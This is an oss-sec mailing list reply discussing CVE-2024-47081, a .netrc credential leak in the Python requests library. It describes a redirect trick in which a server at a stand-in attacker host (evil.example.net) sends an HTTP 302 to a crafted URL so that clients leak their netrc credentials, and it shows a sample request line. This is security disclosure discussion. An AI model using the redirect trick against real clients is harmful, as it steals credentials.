oss-sec mailing list archives
Re: CVE-2024-47081: Netrc credential leak in PSF requests library
From: Jakub Wilk <jwilk () jwilk net>
Date: Wed, 4 Jun 2025 19:18:12 +0200
* Alan Coopersmith <alan.coopersmith () oracle com>, 2025-06-03 10:09:
I'm not sure how the attacker is supposed to get the victim to make a requests call using a URL the attacker controls
The attacker could set a public HTTP server at <http://evil.example.net/> that redirects (via HTTP 302) everything to, say, <http://github.com:@evil.example.net>. Then they would only need to wait patiently for a visit from a robot that has requests under the hood.
* Juho Forsén, 2025-05-31 06:30:
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
I'm not aware of any good way to disable netrc support in requests: https://github.com/requests/requests/issues/2773In particular, AFAICT something like
requests.get("http://evil.example.net/", auth=("", ""))
(that was alluded by Juho) doesn't help in the presence of redirects.
The redirected URL would still be fetched with netrc auth.
-- Jakub Wilk
Current thread:
- CVE-2024-47081: Netrc credential leak in PSF requests library Alan Coopersmith (Jun 03)
- Re: CVE-2024-47081: Netrc credential leak in PSF requests library Dave Walker (Jun 03)
- Re: CVE-2024-47081: Netrc credential leak in PSF requests library Demi Marie Obenour (Jun 03)
- Re: CVE-2024-47081: Netrc credential leak in PSF requests library Jakub Wilk (Jun 04)
